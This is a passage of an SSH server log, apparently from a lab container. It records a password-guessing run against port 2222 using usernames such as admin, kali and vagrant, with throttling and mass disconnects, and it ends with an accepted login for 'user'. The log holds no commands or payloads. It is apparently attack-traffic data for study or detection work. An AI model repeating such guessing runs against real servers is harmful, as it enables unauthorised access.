not get shadow information for NOUSER +2023-11-06 22:47:35.123406630 Failed password for invalid user adaliah from 172.18.0.1 port 56810 ssh2 +2023-11-06 22:47:35.176435463 Invalid user adversary from 172.18.0.1 port 56812 +2023-11-06 22:47:36.214857172 Could not get shadow information for NOUSER +2023-11-06 22:47:36.222375714 Failed password for invalid user adversary from 172.18.0.1 port 56812 ssh2 +2023-11-06 22:47:36.280291214 Invalid user admin from 172.18.0.1 port 56814 +2023-11-06 22:47:37.316241756 Could not get shadow information for NOUSER +2023-11-06 22:47:37.327537131 Failed password for invalid user admin from 172.18.0.1 port 56814 ssh2 +2023-11-06 22:47:37.381053006 Invalid user account from 172.18.0.1 port 56816 +2023-11-06 22:47:38.411561215 Could not get shadow information for NOUSER +2023-11-06 22:47:38.423963423 Failed password for invalid user account from 172.18.0.1 port 56816 ssh2 +2023-11-06 22:47:38.473218465 Invalid user vagrant from 172.18.0.1 port 56818 +2023-11-06 22:47:39.511063257 Could not get shadow information for NOUSER +2023-11-06 22:47:39.517019382 Failed password for invalid user vagrant from 172.18.0.1 port 56818 ssh2 +2023-11-06 22:47:39.559308174 Invalid user kali from 172.18.0.1 port 57166 +2023-11-06 22:47:40.589073841 Could not get shadow information for NOUSER +2023-11-06 22:47:40.601132341 Failed password for invalid user kali from 172.18.0.1 port 57166 ssh2 +2023-11-06 22:47:41.694112425 Failed password for user from 172.18.0.1 port 57168 ssh2 +2023-11-06 22:47:41.748055216 Invalid user adaliah from 172.18.0.1 port 57170 +2023-11-06 22:47:42.773135050 Could not get shadow information for NOUSER +2023-11-06 22:47:42.785041258 Failed password for invalid user adaliah from 172.18.0.1 port 57170 ssh2 +2023-11-06 22:47:42.831820675 Invalid user adversary from 172.18.0.1 port 57172 +2023-11-06 22:47:43.863963884 Could not get shadow information for NOUSER +2023-11-06 22:47:43.878099967 Failed password for invalid user 
adversary from 172.18.0.1 port 57172 ssh2 +2023-11-06 22:47:43.938541301 Invalid user admin from 172.18.0.1 port 57174 +2023-11-06 22:47:44.975590718 Could not get shadow information for NOUSER +2023-11-06 22:47:44.987088468 Failed password for invalid user admin from 172.18.0.1 port 57174 ssh2 +2023-11-06 22:47:45.037872718 Invalid user account from 172.18.0.1 port 57176 +2023-11-06 22:47:46.068171510 Could not get shadow information for NOUSER +2023-11-06 22:47:46.080754760 Failed password for invalid user account from 172.18.0.1 port 57176 ssh2 +2023-11-06 22:47:46.126451093 Invalid user vagrant from 172.18.0.1 port 57178 +2023-11-06 22:47:47.154401385 Could not get shadow information for NOUSER +2023-11-06 22:47:47.166600135 Failed password for invalid user vagrant from 172.18.0.1 port 57178 ssh2 +2023-11-06 22:47:47.173069677 beginning MaxStartups throttling +2023-11-06 22:47:47.173077635 drop connection #17 from [172.18.0.1]:57180 on [172.18.0.2]:2222 past MaxStartups +2023-11-06 22:47:47.213565969 Invalid user adaliah from 172.18.0.1 port 57184 +2023-11-06 22:47:48.240972178 Could not get shadow information for NOUSER +2023-11-06 22:47:48.246550969 Failed password for invalid user adaliah from 172.18.0.1 port 57184 ssh2 +2023-11-06 22:47:48.291376469 Invalid user admin from 172.18.0.1 port 57188 +2023-11-06 22:47:49.325021845 Could not get shadow information for NOUSER +2023-11-06 22:47:49.336594011 Failed password for invalid user admin from 172.18.0.1 port 57188 ssh2 +2023-11-06 22:47:49.383918887 Invalid user account from 172.18.0.1 port 63562 +2023-11-06 22:47:50.413350929 Could not get shadow information for NOUSER +2023-11-06 22:47:50.426958387 Failed password for invalid user account from 172.18.0.1 port 63562 ssh2 +2023-11-06 22:47:50.485255595 Invalid user adaliah from 172.18.0.1 port 63570 +2023-11-06 22:47:51.509262388 Could not get shadow information for NOUSER +2023-11-06 22:47:51.521046596 Failed password for invalid user adaliah from 
172.18.0.1 port 63570 ssh2 +2023-11-06 22:47:51.574903304 Invalid user adversary from 172.18.0.1 port 63572 +2023-11-06 22:47:52.599938013 Could not get shadow information for NOUSER +2023-11-06 22:47:52.611767555 Failed password for invalid user adversary from 172.18.0.1 port 63572 ssh2 +2023-11-06 22:47:52.658722930 Invalid user admin from 172.18.0.1 port 63574 +2023-11-06 22:47:53.697234680 Could not get shadow information for NOUSER +2023-11-06 22:47:53.708034847 Failed password for invalid user admin from 172.18.0.1 port 63574 ssh2 +2023-11-06 22:47:53.758063097 Invalid user vagrant from 172.18.0.1 port 63578 +2023-11-06 22:47:54.788087833 Could not get shadow information for NOUSER +2023-11-06 22:47:54.799692208 Failed password for invalid user vagrant from 172.18.0.1 port 63578 ssh2 +2023-11-06 22:47:54.845006666 Invalid user kali from 172.18.0.1 port 63580 +2023-11-06 22:47:55.875487917 Could not get shadow information for NOUSER +2023-11-06 22:47:55.885755792 Failed password for invalid user kali from 172.18.0.1 port 63580 ssh2 +2023-11-06 22:47:56.974804876 Failed password for user from 172.18.0.1 port 63582 ssh2 +2023-11-06 22:47:57.026923584 Invalid user adaliah from 172.18.0.1 port 63584 +2023-11-06 22:47:58.048577710 Could not get shadow information for NOUSER +2023-11-06 22:47:58.051859918 Failed password for invalid user adaliah from 172.18.0.1 port 63584 ssh2 +2023-11-06 22:47:58.095383168 Invalid user account from 172.18.0.1 port 63590 +2023-11-06 22:47:59.123645169 Could not get shadow information for NOUSER +2023-11-06 22:47:59.134416919 Failed password for invalid user account from 172.18.0.1 port 63590 ssh2 +2023-11-06 22:48:00.228117502 Failed password for user from 172.18.0.1 port 57736 ssh2 +2023-11-06 22:48:00.277429961 Invalid user admin from 172.18.0.1 port 57742 +2023-11-06 22:48:01.320869045 Could not get shadow information for NOUSER +2023-11-06 22:48:01.327795211 Failed password for invalid user admin from 172.18.0.1 port 57742 ssh2 
+2023-11-06 22:48:01.374639711 Invalid user account from 172.18.0.1 port 57744 +2023-11-06 22:48:02.409012295 Could not get shadow information for NOUSER +2023-11-06 22:48:02.423940962 Failed password for invalid user account from 172.18.0.1 port 57744 ssh2 +2023-11-06 22:48:02.476245212 Invalid user vagrant from 172.18.0.1 port 57746 +2023-11-06 22:48:03.507601212 Could not get shadow information for NOUSER +2023-11-06 22:48:03.518392796 Failed password for invalid user vagrant from 172.18.0.1 port 57746 ssh2 +2023-11-06 22:48:03.563891254 Invalid user kali from 172.18.0.1 port 57748 +2023-11-06 22:48:04.591916046 Could not get shadow information for NOUSER +2023-11-06 22:48:04.603218004 Failed password for invalid user kali from 172.18.0.1 port 57748 ssh2 +2023-11-06 22:48:05.692826797 Failed password for user from 172.18.0.1 port 57750 ssh2 +2023-11-06 22:48:05.741521630 Invalid user adaliah from 172.18.0.1 port 57752 +2023-11-06 22:48:06.774187797 Could not get shadow information for NOUSER +2023-11-06 22:48:06.779352797 Failed password for invalid user adaliah from 172.18.0.1 port 57752 ssh2 +2023-11-06 22:48:06.831262672 Invalid user vagrant from 172.18.0.1 port 57760 +2023-11-06 22:48:07.862115131 Could not get shadow information for NOUSER +2023-11-06 22:48:07.873855798 Failed password for invalid user vagrant from 172.18.0.1 port 57760 ssh2 +2023-11-06 22:48:07.922881589 Invalid user adaliah from 172.18.0.1 port 57766 +2023-11-06 22:48:08.953212382 Could not get shadow information for NOUSER +2023-11-06 22:48:08.969336173 Failed password for invalid user adaliah from 172.18.0.1 port 57766 ssh2 +2023-11-06 22:48:09.018880965 Invalid user account from 172.18.0.1 port 60686 +2023-11-06 22:48:10.050105174 Could not get shadow information for NOUSER +2023-11-06 22:48:10.061038799 Failed password for invalid user account from 172.18.0.1 port 60686 ssh2 +2023-11-06 22:48:10.105418299 Invalid user vagrant from 172.18.0.1 port 60688 +2023-11-06 22:48:11.133851258 
Could not get shadow information for NOUSER +2023-11-06 22:48:11.145637924 Failed password for invalid user vagrant from 172.18.0.1 port 60688 ssh2 +2023-11-06 22:48:11.192699424 Invalid user kali from 172.18.0.1 port 60690 +2023-11-06 22:48:12.221855925 Could not get shadow information for NOUSER +2023-11-06 22:48:12.235747258 Failed password for invalid user kali from 172.18.0.1 port 60690 ssh2 +2023-11-06 22:48:13.336727259 Failed password for user from 172.18.0.1 port 60692 ssh2 +2023-11-06 22:48:13.390166759 Invalid user account from 172.18.0.1 port 60700 +2023-11-06 22:48:14.420674176 Could not get shadow information for NOUSER +2023-11-06 22:48:14.433940009 Failed password for invalid user account from 172.18.0.1 port 60700 ssh2 +2023-11-06 22:48:14.474556051 Invalid user vagrant from 172.18.0.1 port 60702 +2023-11-06 22:48:15.505633051 Could not get shadow information for NOUSER +2023-11-06 22:48:15.517580676 Failed password for invalid user vagrant from 172.18.0.1 port 60702 ssh2 +2023-11-06 22:48:15.561937051 Invalid user admin from 172.18.0.1 port 60712 +2023-11-06 22:48:16.596020885 Could not get shadow information for NOUSER +2023-11-06 22:48:16.607210885 Failed password for invalid user admin from 172.18.0.1 port 60712 ssh2 +2023-11-06 22:48:16.658153094 Invalid user account from 172.18.0.1 port 60714 +2023-11-06 22:48:17.691616594 Could not get shadow information for NOUSER +2023-11-06 22:48:17.710160386 Failed password for invalid user account from 172.18.0.1 port 60714 ssh2 +2023-11-06 22:48:17.762175469 Invalid user vagrant from 172.18.0.1 port 60716 +2023-11-06 22:48:18.794953178 Could not get shadow information for NOUSER +2023-11-06 22:48:18.810801428 Failed password for invalid user vagrant from 172.18.0.1 port 60716 ssh2 +2023-11-06 22:48:18.870966636 Invalid user admin from 172.18.0.1 port 59598 +2023-11-06 22:48:19.910493428 Could not get shadow information for NOUSER +2023-11-06 22:48:19.923454345 Failed password for invalid user admin 
from 172.18.0.1 port 59598 ssh2 +2023-11-06 22:48:19.968721137 Invalid user account from 172.18.0.1 port 59600 +2023-11-06 22:48:20.997565512 Could not get shadow information for NOUSER +2023-11-06 22:48:21.010048846 Failed password for invalid user account from 172.18.0.1 port 59600 ssh2 +2023-11-06 22:48:21.061407012 Invalid user account from 172.18.0.1 port 59614 +2023-11-06 22:48:22.094652388 Could not get shadow information for NOUSER +2023-11-06 22:48:22.105072054 Failed password for invalid user account from 172.18.0.1 port 59614 ssh2 +2023-11-06 22:48:22.150856263 Invalid user kali from 172.18.0.1 port 59618 +2023-11-06 22:48:23.178066763 Could not get shadow information for NOUSER +2023-11-06 22:48:23.181511347 Failed password for invalid user kali from 172.18.0.1 port 59618 ssh2 +2023-11-06 22:48:23.226933180 Invalid user admin from 172.18.0.1 port 59626 +2023-11-06 22:48:24.258626875 Could not get shadow information for NOUSER +2023-11-06 22:48:24.269883208 Failed password for invalid user admin from 172.18.0.1 port 59626 ssh2 +2023-11-06 22:48:24.318894125 Invalid user account from 172.18.0.1 port 59628 +2023-11-06 22:48:25.350550792 Could not get shadow information for NOUSER +2023-11-06 22:48:25.362434542 Failed password for invalid user account from 172.18.0.1 port 59628 ssh2 +2023-11-06 22:48:25.408176125 Invalid user vagrant from 172.18.0.1 port 59630 +2023-11-06 22:48:26.444898876 Could not get shadow information for NOUSER +2023-11-06 22:48:26.449472334 Failed password for invalid user vagrant from 172.18.0.1 port 59630 ssh2 +2023-11-06 22:48:26.498575167 Invalid user adaliah from 172.18.0.1 port 59636 +2023-11-06 22:48:27.535871876 Could not get shadow information for NOUSER +2023-11-06 22:48:27.543689876 Failed password for invalid user adaliah from 172.18.0.1 port 59636 ssh2 +2023-11-06 22:48:27.584960251 Invalid user adversary from 172.18.0.1 port 59638 +2023-11-06 22:48:28.622973460 Could not get shadow information for NOUSER +2023-11-06 
22:48:28.636902085 Failed password for invalid user adversary from 172.18.0.1 port 59638 ssh2 +2023-11-06 22:48:28.684833043 Invalid user account from 172.18.0.1 port 59642 +2023-11-06 22:48:29.725476919 Could not get shadow information for NOUSER +2023-11-06 22:48:29.729137252 Failed password for invalid user account from 172.18.0.1 port 59642 ssh2 +2023-11-06 22:48:30.824672003 Failed password for user from 172.18.0.1 port 62338 ssh2 +2023-11-06 22:48:30.876511669 Invalid user admin from 172.18.0.1 port 62344 +2023-11-06 22:48:31.912548545 Could not get shadow information for NOUSER +2023-11-06 22:48:31.924813503 Failed password for invalid user admin from 172.18.0.1 port 62344 ssh2 +2023-11-06 22:48:31.969595462 Invalid user kali from 172.18.0.1 port 62350 +2023-11-06 22:48:33.003719045 Could not get shadow information for NOUSER +2023-11-06 22:48:33.013054795 Failed password for invalid user kali from 172.18.0.1 port 62350 ssh2 +2023-11-06 22:48:34.105514088 Failed password for user from 172.18.0.1 port 62352 ssh2 +2023-11-06 22:48:34.159537421 Invalid user account from 172.18.0.1 port 62360 +2023-11-06 22:48:35.191449088 Could not get shadow information for NOUSER +2023-11-06 22:48:35.203445463 Failed password for invalid user account from 172.18.0.1 port 62360 ssh2 +2023-11-06 22:48:35.252894921 Invalid user admin from 172.18.0.1 port 62372 +2023-11-06 22:48:36.291224672 Could not get shadow information for NOUSER +2023-11-06 22:48:36.301858630 Failed password for invalid user admin from 172.18.0.1 port 62372 ssh2 +2023-11-06 22:48:36.348375547 Invalid user account from 172.18.0.1 port 62374 +2023-11-06 22:48:37.389955881 Could not get shadow information for NOUSER +2023-11-06 22:48:37.396509922 Failed password for invalid user account from 172.18.0.1 port 62374 ssh2 +2023-11-06 22:48:37.437288172 Invalid user vagrant from 172.18.0.1 port 62376 +2023-11-06 22:48:38.469349340 Could not get shadow information for NOUSER +2023-11-06 22:48:38.480299756 Failed 
password for invalid user vagrant from 172.18.0.1 port 62376 ssh2 +2023-11-06 22:48:38.528076340 Invalid user adaliah from 172.18.0.1 port 62382 +2023-11-06 22:48:39.556368590 Could not get shadow information for NOUSER +2023-11-06 22:48:39.569445965 Failed password for invalid user adaliah from 172.18.0.1 port 62382 ssh2 +2023-11-06 22:48:39.623015424 Invalid user account from 172.18.0.1 port 59512 +2023-11-06 22:48:40.654591091 Could not get shadow information for NOUSER +2023-11-06 22:48:40.667488841 Failed password for invalid user account from 172.18.0.1 port 59512 ssh2 +2023-11-06 22:48:40.717989299 Invalid user kali from 172.18.0.1 port 59516 +2023-11-06 22:48:41.746033675 Could not get shadow information for NOUSER +2023-11-06 22:48:41.758365425 Failed password for invalid user kali from 172.18.0.1 port 59516 ssh2 +2023-11-06 22:48:41.807447966 Invalid user adversary from 172.18.0.1 port 59522 +2023-11-06 22:48:42.842157175 Could not get shadow information for NOUSER +2023-11-06 22:48:42.853745675 Failed password for invalid user adversary from 172.18.0.1 port 59522 ssh2 +2023-11-06 22:48:42.895714092 Invalid user admin from 172.18.0.1 port 59524 +2023-11-06 22:48:43.936746551 Could not get shadow information for NOUSER +2023-11-06 22:48:43.948636592 Failed password for invalid user admin from 172.18.0.1 port 59524 ssh2 +2023-11-06 22:48:43.998632384 Invalid user kali from 172.18.0.1 port 59530 +2023-11-06 22:48:45.033451551 Could not get shadow information for NOUSER +2023-11-06 22:48:45.043029093 Failed password for invalid user kali from 172.18.0.1 port 59530 ssh2 +2023-11-06 22:48:45.092704926 Invalid user account from 172.18.0.1 port 59540 +2023-11-06 22:48:46.131901635 Could not get shadow information for NOUSER +2023-11-06 22:48:46.146019510 Failed password for invalid user account from 172.18.0.1 port 59540 ssh2 +2023-11-06 22:48:46.203998968 Invalid user adaliah from 172.18.0.1 port 59548 +2023-11-06 22:48:47.233037969 Could not get shadow 
information for NOUSER +2023-11-06 22:48:47.242970094 Failed password for invalid user adaliah from 172.18.0.1 port 59548 ssh2 +2023-11-06 22:48:47.297127094 Invalid user account from 172.18.0.1 port 59554 +2023-11-06 22:48:48.343580636 Could not get shadow information for NOUSER +2023-11-06 22:48:48.348377719 Failed password for invalid user account from 172.18.0.1 port 59554 ssh2 +2023-11-06 22:48:48.388330469 Invalid user kali from 172.18.0.1 port 59558 +2023-11-06 22:48:49.418140595 Could not get shadow information for NOUSER +2023-11-06 22:48:49.427916428 Failed password for invalid user kali from 172.18.0.1 port 59558 ssh2 +2023-11-06 22:48:49.486853803 Invalid user adaliah from 172.18.0.1 port 64914 +2023-11-06 22:48:50.514166137 Could not get shadow information for NOUSER +2023-11-06 22:48:50.526111929 Failed password for invalid user adaliah from 172.18.0.1 port 64914 ssh2 +2023-11-06 22:48:50.576187762 Invalid user adversary from 172.18.0.1 port 64916 +2023-11-06 22:48:51.618145096 Could not get shadow information for NOUSER +2023-11-06 22:48:51.621678679 Failed password for invalid user adversary from 172.18.0.1 port 64916 ssh2 +2023-11-06 22:48:52.714494680 Failed password for user from 172.18.0.1 port 64926 ssh2 +2023-11-06 22:48:52.782944263 Invalid user admin from 172.18.0.1 port 64960 +2023-11-06 22:48:53.820247889 Could not get shadow information for NOUSER +2023-11-06 22:48:53.832695930 Failed password for invalid user admin from 172.18.0.1 port 64960 ssh2 +2023-11-06 22:48:53.892832264 Invalid user vagrant from 172.18.0.1 port 64978 +2023-11-06 22:48:54.923819583 Could not get shadow information for NOUSER +2023-11-06 22:48:54.937060333 Failed password for invalid user vagrant from 172.18.0.1 port 64978 ssh2 +2023-11-06 22:48:54.999444833 Invalid user account from 172.18.0.1 port 64990 +2023-11-06 22:48:56.032824750 Could not get shadow information for NOUSER +2023-11-06 22:48:56.045057667 Failed password for invalid user account from 172.18.0.1 
port 64990 ssh2 +2023-11-06 22:48:56.089747167 Invalid user kali from 172.18.0.1 port 64994 +2023-11-06 22:48:57.122720418 Could not get shadow information for NOUSER +2023-11-06 22:48:57.137538918 Failed password for invalid user kali from 172.18.0.1 port 64994 ssh2 +2023-11-06 22:48:57.196935293 Invalid user admin from 172.18.0.1 port 65002 +2023-11-06 22:48:58.234133293 Could not get shadow information for NOUSER +2023-11-06 22:48:58.243898293 Failed password for invalid user admin from 172.18.0.1 port 65002 ssh2 +2023-11-06 22:48:58.290686960 Invalid user kali from 172.18.0.1 port 65008 +2023-11-06 22:48:59.320755585 Could not get shadow information for NOUSER +2023-11-06 22:48:59.333699377 Failed password for invalid user kali from 172.18.0.1 port 65008 ssh2 +2023-11-06 22:48:59.392202002 Invalid user adversary from 172.18.0.1 port 63804 +2023-11-06 22:49:00.425985961 Could not get shadow information for NOUSER +2023-11-06 22:49:00.438513877 Failed password for invalid user adversary from 172.18.0.1 port 63804 ssh2 +2023-11-06 22:49:00.486707836 Invalid user adversary from 172.18.0.1 port 63818 +2023-11-06 22:49:01.519720711 Could not get shadow information for NOUSER +2023-11-06 22:49:01.531781795 Failed password for invalid user adversary from 172.18.0.1 port 63818 ssh2 +2023-11-06 22:49:02.629645629 Failed password for user from 172.18.0.1 port 63828 ssh2 +2023-11-06 22:49:03.748132671 Failed password for user from 172.18.0.1 port 63856 ssh2 +2023-11-06 22:49:04.840398296 Failed password for user from 172.18.0.1 port 63870 ssh2 +2023-11-06 22:49:04.937191921 Invalid user kali from 172.18.0.1 port 63924 +2023-11-06 22:49:05.963623422 Could not get shadow information for NOUSER +2023-11-06 22:49:05.978100797 Failed password for invalid user kali from 172.18.0.1 port 63924 ssh2 +2023-11-06 22:49:06.037463672 Invalid user kali from 172.18.0.1 port 63938 +2023-11-06 22:49:07.077753047 Could not get shadow information for NOUSER +2023-11-06 22:49:07.081509589 
Failed password for invalid user kali from 172.18.0.1 port 63938 ssh2 +2023-11-06 22:49:07.157645381 Invalid user adversary from 172.18.0.1 port 63972 +2023-11-06 22:49:08.197835256 Connection closed by invalid user kali 172.18.0.1 port 65008 [preauth] +2023-11-06 22:49:08.197841548 Connection closed by invalid user account 172.18.0.1 port 63562 [preauth] +2023-11-06 22:49:08.205066923 Connection closed by invalid user account 172.18.0.1 port 60686 [preauth] +2023-11-06 22:49:08.205069798 Connection closed by invalid user vagrant 172.18.0.1 port 57760 [preauth] +2023-11-06 22:49:08.205070673 Connection closed by invalid user account 172.18.0.1 port 62374 [preauth] +2023-11-06 22:49:08.205073131 Connection closed by invalid user account 172.18.0.1 port 60700 [preauth] +2023-11-06 22:49:08.205073756 Connection closed by invalid user adversary 172.18.0.1 port 63972 [preauth] +2023-11-06 22:49:08.205074840 Connection closed by invalid user admin 172.18.0.1 port 59598 [preauth] +2023-11-06 22:49:08.205075465 Connection closed by invalid user kali 172.18.0.1 port 57748 [preauth] +2023-11-06 22:49:08.205076006 Connection closed by invalid user kali 172.18.0.1 port 64994 [preauth] +2023-11-06 22:49:08.205076548 Connection closed by invalid user admin 172.18.0.1 port 62344 [preauth] +2023-11-06 22:49:08.205077090 Connection closed by invalid user kali 172.18.0.1 port 63924 [preauth] +2023-11-06 22:49:08.205085798 Connection closed by invalid user account 172.18.0.1 port 59554 [preauth] +2023-11-06 22:49:08.207773798 Connection closed by invalid user account 172.18.0.1 port 59642 [preauth] +2023-11-06 22:49:08.207784131 Connection closed by invalid user adaliah 172.18.0.1 port 59548 [preauth] +2023-11-06 22:49:08.207785006 Connection closed by authenticating user user 172.18.0.1 port 60692 [preauth] +2023-11-06 22:49:08.207785715 Connection closed by invalid user account 172.18.0.1 port 57176 [preauth] +2023-11-06 22:49:08.207786298 Connection closed by invalid user adaliah 
172.18.0.1 port 63584 [preauth] +2023-11-06 22:49:08.207786881 Connection closed by authenticating user user 172.18.0.1 port 62352 [preauth] +2023-11-06 22:49:08.207787423 Connection closed by invalid user adaliah 172.18.0.1 port 57752 [preauth] +2023-11-06 22:49:08.207787965 Connection closed by invalid user admin 172.18.0.1 port 59626 [preauth] +2023-11-06 22:49:08.207793965 Connection closed by invalid user admin 172.18.0.1 port 59524 [preauth] +2023-11-06 22:49:08.207794590 Connection closed by authenticating user user 172.18.0.1 port 57736 [preauth] +2023-11-06 22:49:08.207795173 Connection closed by invalid user account 172.18.0.1 port 59540 [preauth] +2023-11-06 22:49:08.207795756 Connection closed by invalid user adversary 172.18.0.1 port 63572 [preauth] +2023-11-06 22:49:08.207796340 Connection closed by authenticating user user 172.18.0.1 port 63828 [preauth] +2023-11-06 22:49:08.207796881 Connection closed by invalid user vagrant 172.18.0.1 port 60688 [preauth] +2023-11-06 22:49:08.207803590 Connection closed by invalid user kali 172.18.0.1 port 56806 [preauth] +2023-11-06 22:49:08.207804256 Connection closed by authenticating user user 172.18.0.1 port 57750 [preauth] +2023-11-06 22:49:08.207804840 Connection closed by invalid user admin 172.18.0.1 port 60712 [preauth] +2023-11-06 22:49:08.207805381 Connection closed by invalid user account 172.18.0.1 port 59628 [preauth] +2023-11-06 22:49:08.207805965 Connection closed by invalid user adversary 172.18.0.1 port 57172 [preauth] +2023-11-06 22:49:08.207806506 Connection closed by invalid user adaliah 172.18.0.1 port 57766 [preauth] +2023-11-06 22:49:08.207807048 Connection closed by invalid user vagrant 172.18.0.1 port 59630 [preauth] +2023-11-06 22:49:08.207807590 Connection closed by invalid user account 172.18.0.1 port 60714 [preauth] +2023-11-06 22:49:08.207808173 Connection closed by invalid user account 172.18.0.1 port 59600 [preauth] +2023-11-06 22:49:08.207808715 Connection closed by invalid user 
kali 172.18.0.1 port 60690 [preauth] +2023-11-06 22:49:08.207809256 Connection closed by invalid user adversary 172.18.0.1 port 63818 [preauth] +2023-11-06 22:49:08.207809798 Connection closed by invalid user admin 172.18.0.1 port 63574 [preauth] +2023-11-06 22:49:08.207810340 Connection closed by invalid user vagrant 172.18.0.1 port 60702 [preauth] +2023-11-06 22:49:08.207815423 Connection closed by invalid user admin 172.18.0.1 port 57174 [preauth] +2023-11-06 22:49:08.207816006 Connection closed by invalid user kali 172.18.0.1 port 62350 [preauth] +2023-11-06 22:49:08.207816590 Connection closed by invalid user vagrant 172.18.0.1 port 56804 [preauth] +2023-11-06 22:49:08.207817131 Connection closed by invalid user kali 172.18.0.1 port 59618 [preauth] +2023-11-06 22:49:08.207817673 Connection closed by invalid user adaliah 172.18.0.1 port 57170 [preauth] +2023-11-06 22:49:08.207818256 Connection closed by invalid user vagrant 172.18.0.1 port 62376 [preauth] +2023-11-06 22:49:08.207818798 Connection closed by invalid user adversary 172.18.0.1 port 63804 [preauth] +2023-11-06 22:49:08.207819340 Connection closed by invalid user adaliah 172.18.0.1 port 56810 [preauth] +2023-11-06 22:49:08.207819881 Connection closed by invalid user adaliah 172.18.0.1 port 62382 [preauth] +2023-11-06 22:49:08.207820423 Connection closed by invalid user vagrant 172.18.0.1 port 60716 [preauth] +2023-11-06 22:49:08.207821006 Connection closed by invalid user adversary 172.18.0.1 port 64916 [preauth] +2023-11-06 22:49:08.207826840 Connection closed by invalid user kali 172.18.0.1 port 59558 [preauth] +2023-11-06 22:49:08.207827465 Connection closed by authenticating user user 172.18.0.1 port 57168 [preauth] +2023-11-06 22:49:08.207828006 Connection closed by invalid user adaliah 172.18.0.1 port 57184 [preauth] +2023-11-06 22:49:08.207828590 Connection closed by invalid user vagrant 172.18.0.1 port 57746 [preauth] +2023-11-06 22:49:08.207829131 Connection closed by invalid user adaliah 
172.18.0.1 port 63570 [preauth] +2023-11-06 22:49:08.207829715 Connection closed by authenticating user user 172.18.0.1 port 64926 [preauth] +2023-11-06 22:49:08.212886298 Connection closed by invalid user admin 172.18.0.1 port 62372 [preauth] +2023-11-06 22:49:08.212888631 Connection closed by invalid user account 172.18.0.1 port 56802 [preauth] +2023-11-06 22:49:08.212889215 Connection closed by invalid user account 172.18.0.1 port 59614 [preauth] +2023-11-06 22:49:08.212889798 Connection closed by invalid user vagrant 172.18.0.1 port 56818 [preauth] +2023-11-06 22:49:08.212890340 Connection closed by invalid user adaliah 172.18.0.1 port 64914 [preauth] +2023-11-06 22:49:08.212890923 Connection closed by authenticating user user 172.18.0.1 port 63856 [preauth] +2023-11-06 22:49:08.212891465 Connection closed by invalid user account 172.18.0.1 port 63590 [preauth] +2023-11-06 22:49:08.212892006 Connection closed by invalid user vagrant 172.18.0.1 port 63578 [preauth] +2023-11-06 22:49:08.212892548 Connection closed by invalid user adversary 172.18.0.1 port 59638 [preauth] +2023-11-06 22:49:08.212893131 Connection closed by authenticating user user 172.18.0.1 port 63582 [preauth] +2023-11-06 22:49:08.212893673 Connection closed by invalid user adaliah 172.18.0.1 port 59636 [preauth] +2023-11-06 22:49:08.212894256 Connection closed by authenticating user user 172.18.0.1 port 56808 [preauth] +2023-11-06 22:49:08.212894798 Connection closed by authenticating user user 172.18.0.1 port 62338 [preauth] +2023-11-06 22:49:08.212895340 Connection closed by invalid user admin 172.18.0.1 port 64960 [preauth] +2023-11-06 22:49:08.212895881 Connection closed by invalid user account 172.18.0.1 port 57744 [preauth] +2023-11-06 22:49:08.212896423 Connection closed by invalid user adversary 172.18.0.1 port 56812 [preauth] +2023-11-06 22:49:08.212897006 Connection closed by invalid user vagrant 172.18.0.1 port 64978 [preauth] +2023-11-06 22:49:08.212897590 Connection closed by 
invalid user account 172.18.0.1 port 59512 [preauth] +2023-11-06 22:49:08.212898131 Connection closed by invalid user account 172.18.0.1 port 56816 [preauth] +2023-11-06 22:49:08.212898673 Connection closed by authenticating user user 172.18.0.1 port 63870 [preauth] +2023-11-06 22:49:08.212899215 Connection closed by invalid user kali 172.18.0.1 port 57166 [preauth] +2023-11-06 22:49:08.212899798 Connection closed by invalid user admin 172.18.0.1 port 57742 [preauth] +2023-11-06 22:49:08.212900340 Connection closed by invalid user account 172.18.0.1 port 64990 [preauth] +2023-11-06 22:49:08.212900881 Connection closed by invalid user kali 172.18.0.1 port 63580 [preauth] +2023-11-06 22:49:08.212901423 Connection closed by invalid user admin 172.18.0.1 port 55098 [preauth] +2023-11-06 22:49:08.212901965 Connection closed by invalid user adversary 172.18.0.1 port 59522 [preauth] +2023-11-06 22:49:08.212902506 Connection closed by invalid user vagrant 172.18.0.1 port 57178 [preauth] +2023-11-06 22:49:08.212903048 Connection closed by invalid user admin 172.18.0.1 port 57188 [preauth] +2023-11-06 22:49:08.212903590 Connection closed by invalid user admin 172.18.0.1 port 56814 [preauth] +2023-11-06 22:49:08.212904131 Connection closed by invalid user kali 172.18.0.1 port 59530 [preauth] +2023-11-06 22:49:08.212904673 Connection closed by invalid user kali 172.18.0.1 port 59516 [preauth] +2023-11-06 22:49:08.212905215 Connection closed by invalid user admin 172.18.0.1 port 65002 [preauth] +2023-11-06 22:49:08.212905756 Connection closed by invalid user account 172.18.0.1 port 62360 [preauth] +2023-11-06 22:49:08.218237256 Connection closed by invalid user kali 172.18.0.1 port 63938 [preauth] +2023-11-06 22:50:30.547574878 exited MaxStartups throttling after 00:02:43, 203 connections dropped +2023-11-06 22:50:30.611369628 Invalid user admin from 172.18.0.1 port 63728 +2023-11-06 22:50:31.648032961 Could not get shadow information for NOUSER +2023-11-06 22:50:31.661398003 
Failed password for invalid user admin from 172.18.0.1 port 63728 ssh2 +2023-11-06 22:50:31.716389086 Invalid user account from 172.18.0.1 port 63730 +2023-11-06 22:50:32.749380045 Could not get shadow information for NOUSER +2023-11-06 22:50:32.759296295 Failed password for invalid user account from 172.18.0.1 port 63730 ssh2 +2023-11-06 22:50:32.829077545 Invalid user vagrant from 172.18.0.1 port 63732 +2023-11-06 22:50:33.866049421 Could not get shadow information for NOUSER +2023-11-06 22:50:33.880336129 Failed password for invalid user vagrant from 172.18.0.1 port 63732 ssh2 +2023-11-06 22:50:33.934368962 Invalid user kali from 172.18.0.1 port 63734 +2023-11-06 22:50:34.963119630 Could not get shadow information for NOUSER +2023-11-06 22:50:34.976840796 Failed password for invalid user kali from 172.18.0.1 port 63734 ssh2 +2023-11-06 22:50:36.076450505 Accepted password for user from 172.18.0.1 port 63736 ssh2 +2023-11-06 22:50:37.263250297 Connection closed by invalid user account 172.18.0.1 port 63730 [preauth] +2023-11-06 22:50:37.263254047 Connection closed by invalid user vagrant 172.18.0.1 port 63732 [preauth] +2023-11-06 22:50:37.263254881 Connection closed by invalid user admin 172.18.0.1 port 63728 [preauth] +2023-11-06 22:50:37.263255547 Connection closed by invalid user kali 172.18.0.1 port 63734 [preauth] +2023-11-06 22:51:37.251529464 Received signal 15; terminating. +2023-11-07 09:12:43.594864883 Server listening on 0.0.0.0 port 2222. +2023-11-07 09:12:43.596005716 Server listening on :: port 2222. 
